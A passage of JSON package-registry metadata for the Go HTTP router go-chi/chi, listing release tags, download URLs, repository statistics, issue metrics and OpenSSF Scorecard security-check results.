ha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.183Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":7.8620489257759285,"dependent_packages_count":6.970633637833028,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":7.416341281804478},"purl":"pkg:golang/github.com/%21g%21o-%21c%21h%21i/chi/v5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/GO-CHI/chi/v5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/GO-CHI/chi/v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/GO-CHI/chi/v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi%2Fv5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi%2Fv5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi%2Fv5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi%2Fv5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi%2Fv5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FGO-CHI%2Fchi%2Fv5/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":10352399,"name":"github.com/go-Chi/chi/v5","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-Chi/chi","keywords_array":[],"namespace":null,"versions_count":24,"first_release_published_at":"2021-02-28T00:11:55.000Z","latest_release_published_at":"2026-07-05T18:51:45.000Z","latest_release_number":"v5.3.1","last_synced_at":"2026-08-12T02:06:16.828Z","created_at":"2024-06-11T15:44:13.607Z","updated_at":"2026-08-12T02:06:16.829Z","registry_url":"https://pkg.go.dev/github.com/go-Chi/chi/v5","install_command":"go get github.com/go-Chi/chi/v5","documentation_url":"https://pkg.go.dev/github.com/go-Chi/chi/v5#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code 